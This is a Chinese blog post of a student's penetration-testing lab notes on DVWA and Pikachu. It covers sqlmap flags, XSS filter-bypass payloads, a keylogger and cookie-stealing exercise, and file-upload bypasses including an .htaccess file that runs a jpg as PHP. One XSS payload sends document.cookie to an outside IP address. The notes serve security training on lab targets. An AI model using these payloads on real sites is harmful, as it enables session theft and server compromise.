网络安全C11-2025.4.12


1、使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入

--dbs 列出数据库

--tables,-D 列出表格,可以指定数据库

--columns -T,-D 列出字段的信息,可以指定数据库,数据表,字段

--dump,-C,-T,-D,--start,--stop,--first,--last :获取表的数据

2、XSS
(1)完成DVWA靶场存储型XSS的漏洞练习

中等

message参数中使用addslashes(),识别预定义字符:单引号(')、双引号(")、反斜杠(\)和 NULL

name参数中替换script为空

方法:

在name标签中:

大小写绕过 <SCRIPT>alert(1)</SCRIPT>

双写绕过 <scr<script>ipt>alert(1)</scr<script>ipt>

采用其他标签 <img src=x οnerrοr=alert(1)>

高等

message参数中使用addslashes()

name中参数使用正则表达式

方法:在name参数中采用其他事件

<img src=x οnerrοr=alert(1)>

(2)使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie,利用cookie实现登录

在pikachu中存在rk.js,可以监视用户输出的键盘记录

rk.js

定义ajax与xl两个类,定义onkeypress方法,定义realkey接收从键盘传回来的记录,将记录存储到xl里

将记录存储在postdate中,再将该类发送给rkserver.php

rkserver.php

接收传送的值,在后端运行

在具有xss漏洞的正常服务器中插入该代码

内容未显示,代表被解析

访问恶意服务器,完成对该正常服务器的键盘记录

xss获取cookie

cookie.php

该文件定义了获取用户请求信息.

pyload:

<script>document.write('<img src="http://47.108.95.46:8000/pkxss/xcookie/cookie.php?cookie='+document.cookie+'"/>')</script>

通过盲打xss,在登陆后台时,触发该代码执行,获取用户

在cookie-editor中输入cookie值,再输入原网站,完成登录


(3)使用beef制作钓鱼页面,克隆任意站点的登录页面并获取用户登录的账号密码

启动失败了,没搞懂

3、文件上传
(1)客户端绕过练习

js禁用

F12 F1 js禁用

后缀名绕过

该代码是基于前端的代码,只允许jpg png gif 后缀的文件上传

传输get型参数

post型可以用蚁键连接或者使用hackbar post 传参

修改前端代码

将调用checkFile 方法删除,可以直接上传php文件


(2)服务端黑名单绕过:给出.htaccess文件绕过的具体步骤

.htaccess文件绕过 (pass-04)

.htaccess为分布配置文件,可以指定自己目录下的配置规则

中间件为apache时,没有对.htaccess文件进行检测

.htaccess文件:

<FilesMatch "1.jpg">

Sethandler application/x-httpd-php

</FilesMatch>

(将1.jpg的文件以PHP文件来解析)

(将具有php格式的文件以php文件来解析)

<IfModule mime_module>

SetHandler application/x-httpd-php

</IfModule>

上传该文件会使得该服务器出错,因为会使部分文件以php文件解析,无法完成功能

在上传.htaccess文件后,更改配置文件,使得上传的1.jpg文件以php解析,完成上传

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值